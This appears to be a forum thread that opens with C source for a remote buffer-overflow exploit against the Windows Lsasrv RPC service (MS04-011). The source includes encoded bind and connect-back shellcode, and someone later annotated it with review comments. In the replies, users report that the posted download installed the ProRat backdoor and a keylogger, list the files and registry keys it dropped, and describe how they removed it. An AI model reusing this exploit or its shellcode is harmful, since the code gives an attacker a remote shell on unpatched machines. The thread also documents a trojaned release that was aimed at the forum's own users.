)Oni(
#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")

/* Payload used when a connect-back IP is supplied (argc > 4 in main()).
 * The first two fragments are a small x86 decoder stub: it XORs the bytes
 * that follow with 0x99 (the loop counter in the stub is 0x125), so the
 * remainder of the array is stored XOR-0x99 encoded.  main() overwrites
 * scode[111..114] with the connect-back IP and scode[118..119] with the port,
 * both pre-XORed with 0x99 to match the decoder; everything else is a fixed
 * byte sequence.  The string literal's implicit NUL is what strlen(sc) in
 * main() relies on to find the length. */
unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";



/* Payload used when no connect-back IP is supplied (the else branch in
 * main()).  Same layout as scode: a decoder stub that XORs the following
 * bytes with 0x99 (counter 0x17D here), then the encoded body.  main() patches
 * only the port, pre-XORed with 0x99, at scode2[176..177] when argv[3] is
 * given; nothing else varies between runs.  As with scode, the length seen by
 * main() is whatever strlen() finds up to the literal's terminating NUL. */
unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";



/* Calling convention and 12-argument shape this listing assumes for the
 * DsRoleUpgradeDownlevelServer export it resolves at runtime.  Every
 * parameter is declared as unsigned long even though main() passes char
 * pointers, so the compiler cannot type-check the call at all.
 * NOTE(review): the Platform SDK declares this function with wide-string
 * pointer parameters and a handle out-parameter -- confirm against the SDK
 * header before relying on this opaque declaration. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
/* Global function pointer; filled in by GetProcAddress() in main(). */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of payload bytes built in buf; twice that many are handed to the
 * remote call after widening to 16-bit code units. */
#define LEN 3500

char buf[LEN+1];          /* narrow payload; main() fills LEN bytes with 0x90, buf[LEN] stays 0 (static storage) */
char sendbuf[(LEN+1)*2];  /* buf widened to 16-bit little-endian units plus a 2-byte terminator */
char buf2[2];             /* 2-byte zero buffer passed as the filler argument to the remote call */
char target2[200];        /* widened target name; main() clears only 100 bytes and does not bound the copy into it */

/*
 * Entry point.  argv[1] selects the variant ("0" or "1"), argv[2] is the
 * target host, optional argv[3]/argv[4] are a port and a connect-back IP that
 * get patched into the chosen payload.  Returns 0 on every path -- including
 * the usage message and the exit(0) calls below -- so a caller cannot tell a
 * failed run from a completed one by status.
 *
 * NOTE(review): no <stdio.h>, <stdlib.h> or <string.h> is included anywhere
 * on this page; printf/exit/memcpy/strlen/sprintf/atoi are presumably being
 * picked up as implicit declarations by an old compiler -- verify.
 * NOTE(review): the listing depends on a "sbaaNetapi.dll" that is not part of
 * this page.  The thread below reports that the download accompanying this
 * post dropped a backdoor (ProRat), so any binary shipped with it is untrusted.
 */
int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;         /* `c` is never used */
LPSTR hostipc[40];       /* 40 pointers (160 bytes on 32-bit Windows) used as a raw char buffer below */
NETRESOURCE netResource; /* only four members are set; the others are left uninitialised */
unsigned short port;
unsigned long ip;
unsigned char* sc;       /* points at scode or scode2 once chosen */

if (argc < 3) {
/* NOTE: "\bug" below is a backspace escape (\b) followed by "ug"; it was
 * probably meant to read "bug".  Runtime string, left as is. */
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf(""); /* no-op */
return 0;
}

target = argv[2];
/* Unbounded write: sprintf formats an unchecked argv[2] into a 40-pointer
 * automatic array.  A hostname longer than the buffer overruns the stack;
 * snprintf(..., sizeof hostipc, ...) with a length check is the safe form. */
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;



/* Empty user name and password.  Failure is printed but not fatal (the
 * return was commented out), so the rest of main runs with no session. */
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}


/* Resolved from a non-standard DLL name rather than netapi32.dll; the DLL
 * itself is not on this page (see the header note). */
hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0); /* exits with status 0 on failure */
}

/* Casting an lvalue on the left of an assignment is not standard C (an old
 * compiler extension); the portable form casts only the GetProcAddress result. */
(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");

if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0); /* status 0 on failure, as above */
}

memset(buf, '\x90', LEN); /* fill with 0x90; buf[LEN] keeps its static zero */



if(argc>4)
{

/* atoi()/inet_addr() results are unchecked.  Both values are XORed with 0x99
 * bytes so that the payload's decoder turns them back into the real values,
 * then written at fixed offsets inside scode. */
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;

memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);

}
sc=scode2;
}
//attack all 2k sp3 version

/* Fixed 4-byte values at fixed offsets.  Given the surrounding comments they
 * are presumably build-specific addresses -- cannot be confirmed from this page. */
memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
/* strlen() on an unsigned char* is a pointer-sign mismatch; the length is
 * whatever precedes the first NUL in the payload literal. */
memcpy(&buf[2036], sc, strlen(sc));

//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);

memcpy(&buf[2856], sc, strlen(sc));


printf("shellcode size %d\n", strlen(sc)); /* %d with a size_t argument; use %zu or cast */


/* Widen every byte of buf to a 16-bit little-endian unit (high byte 0),
 * then add a 2-byte terminator. */
for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;

/* Variant "1": the payload is also copied un-widened over the start of
 * sendbuf, and further fixed bytes are placed at offsets 1948/1964/1980. */
if(atoi(argv[1])==1)
{
/* &sendbuf is char (*)[...]; same address as sendbuf, but inconsistent with the other memcpy calls */
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}
/* Only 100 of target2's 200 bytes are cleared, and the loop below writes
 * 2*strlen(target) bytes with no bound: a hostname longer than 100 characters
 * overruns target2 (a global, so it corrupts whatever is laid out after it). */
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) { /* int vs size_t comparison */
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
/* Every argument except the first and the ninth is the same 2-byte zero
 * buffer; the widened target name goes in the ninth slot. */
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);

printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);

return 0;
}
tweakz20
Error: Invalid location of rundll32.exe in JPEG library. Cannot call action.
F34R
same problem for me
bleh
:\
tweakz20
heh.. this has the same thing as the one in downloads..
hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);

so as of about an hour ago, this became old wink.gif
(wow, is it just me or did today bring alot of action in this community? lol)
Dwarf
> Error: Invalid location of rundll32.exe in JPEG library. Cannot call action.

Got the same problem here
tweakz20
http://www.governmentsecurity.org/forum/in...?showtopic=8069

there's a link where people got it working
h3llraz0r
hmm, this might be a virus. after running it, services.exe wants to connect to numerous ports, then my norton corporate AV shuts down. services.exe was dropped in c:\windows (hidden in the folder, but visible with a 3rd party process viewer) and then this file showed up: ktd32.atm. so i hex edited this file ktd32.atm and it's the log from a keylogger that must have just started, since the commands i typed after running the .exe are the only ones there.

everyone else might want to take a closer look at this file.
ladykidtwist
my xp reboots upon initiating the exploit
xamilQ
yep this is a lame virus .. don't download it wink.gif
xamilQ
It is ProRat BackDoor
Imo it uses the following files in your Systemroot (WINDOWS\System32\ for XP)
- winkey.dll < the key logger
- wininv.dll < the backdoor

I also found a reg key here:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft DirectX\Winsettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}

Maybe More Later
brOmstar
in what version should be this backdoor?

for me it works perfectly and gives shell after shell, without an entry in the registry; it also starts no programs -- i checked this with procexplorer + autoruns from www.sysinternals.com
)Oni(
i didnt post this, someone used my nick to own u people.
please some moderator or administrator delete this post.
Dwarf
I removed the files from my pc, but it still doesn't want to boot.

Somebody has any suggestions what to do? (without reinstalling windows)

tnx
xamilQ
It drops:
C:\RECYCLER\S-1-5-21-1343024091-1078145449-1060284298-1003\Dc48.dll Geïnfecteerd Backdoor.Prorat.12 <cd0000.0.e>
C:\WINDOWS\system32\winkey.dll Geïnfecteerd Backdoor.Prorat.12 <cd0000.0.e>

Reg Keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y} "StubPath"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run "DirectX For Microsoft® Windows"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Delete the file ktd32.atm in the Windows folder if it exists. (keylog)

More Info:
http://securityresponse.symantec.com/avcen...oor.prorat.html
http://www.sophos.com/virusinfo/analyses/trojproratd.html
http://www.prorat.net
http://www.pestpatrol.com/pestinfo/p/prorat.asp
http://www.megasecurity.org/trojans/p/prorat/Prorat_all.html
Dwarf
It drops some more files, but they are already announced in this forum.

but i will have a look in my recycler directory.

tnx
Dwarf
still get a blue error screen with the following msg:

stop: 0x0000007f (0x00000008,0x00000000,0x00000000,0x00000000)
unexpected_kernel_mode_trap
tweakz20
PEOPLE stop downloading this!!!!!!

)oni(, the admins are slow sometimes, would you please edit your post to take out the download??
Dwarf
Downloaded it yesterday already.... my pc can only reboot anymore, even though i deleted the virus.

somebody any suggestions?
tweakz20
i dunno, this virus is stupid... i opened it and didn't notice a thing (i keep my registry RUN folders empty, works like a charm)
Dwarf
Found it

my computer crashed and restarted all the time because of the virusscanner.

really shit and thats why i prefer to have none.

removed the virus myself.
[Sunny]
How ?
I don't have the rights to delete the dll's. Even when i exploited System rights on my machine i get the message: Access denied.
Can you give me some hints ? Thank you
Flowby
first stop the exe,
services.exe
than go after dll
[Sunny]
this doesn't work for me :-(

C:\>kill.exe services
process #972 [services.exe] killed
process #196 [services.exe] killed



C:\WINDOWS\system32>del wininv.dll
C:\WINDOWS\system32\wininv.dll
Zugriff verweigert ( in English : Access denied )


Some other Methods ?
Dwarf
What i did:

attrib -s -h c:\winnt\services.exe
attrib -s -h c:\winnt\system\sservices.exe
attrib -s -h c:\winnt\system32\fservices.exe

then open 3 dos command screens.

put in 1 screen: del c:\winnt\system\sservices.exe

but don't hit enter yet!....otherwise it will place the file back again

put in 2nd screen: del c:\winnt\system32\fservices.exe

No enter yet!

in the 3rd screen:

go into the c:\winnt directory and type:

kill services.exe

(if you do this in another directory it doesn't work coz there is another "real" services.exe in the c:\winnt\system32 directory)

Then when the process is killed your computer wants to shut down in 60 seconds.

so type in the 3rd dos screen del services.exe (in the c:\winnt directory)

and hit the enter button in the 1st and 2nd dos screen.

Then restart and remove the registry keys and/or the keylog files.

Good luck smile.gif
[Sunny]
yo thank u :-)
With your manual i removed the f*cking backdoor :-D
Starlight
i have format me c:\
sad.gif

wy did you post something like that sad.gif sad.gif sad.gif